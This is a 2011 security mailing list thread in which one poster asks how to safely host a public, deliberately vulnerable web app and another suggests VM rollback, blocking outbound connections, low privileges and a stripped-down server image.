Web Application Security
Re: securing a deliberately vulnerable web app Jul 05 2011 09:35PM
Robin Wood (robin digininja org)
On 5 July 2011 22:32, Charlie Belmer <charlie.belmer (at) gmail (dot) com [email concealed]> wrote:
> Hi Robin,
>
> A couple of suggestions:
>
> Definitely VM it and roll it back frequently. You might want a list of
> warnings to watch for, like someone trying to install root kits or run
> certain shell commands, at which point it could trigger a roll back to
> remove any custom malicious software.
> Don't allow any connections out from the server, aside from the HTTP (or
> whatever) connections initiated by the web browsers. this goes a long way to
> preventing pivot attacks.(would have to be an external firewall device)
> Make sure permissions on the web user are extremely low.
> Use a bare bones server image - strip out anything unnecessary from the
> image which isn't required for your service. Especially things like
> compilers and libraries not used by your app.
> A lot of the test/practice apps just simulate security vulnerabilities to
> prevent this kind of thing - see
> http://zero.webappsecurity.com/rootlogin.asp.bak as case in point (which
> itself seems to be a security flaw..)
>
> I am sure there is more you can do, but this is what I could quickly come up
> with.
>

Thanks for the ideas.

Robin

> Charlie
> https://www.golemtechnologies.com
>
> On Sun, Jul 3, 2011 at 6:51 PM, Robin Wood <robin (at) digininja (dot) org [email concealed]> wrote:
>>
>> This is a question for anyone who runs a deliberately vulnerable web
>> app on a public facing site to allow people to test hacking it or to
>> test vulnerability scanners against it. I'm thinking of things like
>> http://test.acunetix.com/ .
>>
>> What I'd like to know is how you go about securing the box the sites
>> are running on. Obviously you need the site running on its own server,
>> preferably airgapped from the rest of your network but how do you
>> protect yourself from attackers getting on the box then pivoting from
>> it to do a real attack to someone else? I'm guessing it is something
>> like a VM that is automatically rolled back periodically so even if
>> someone tries then they only have a limited attack window but are
>> there any other things people do?
>>
>> I'm asking because I've got an idea for a new public service which
>> would involve putting up an app that is vulnerable but I'd like to
>> make sure that if I do I protect myself as much as possible.
>>
>> Robin
>>
>>
>>
>> This list is sponsored by Cenzic
>> --------------------------------------
>> Let Us Hack You. Before Hackers Do!
>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
>> Request Yours Now!
>> http://www.cenzic.com/2009HClaunch_Securityfocus
>> --------------------------------------
>>
>
>

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus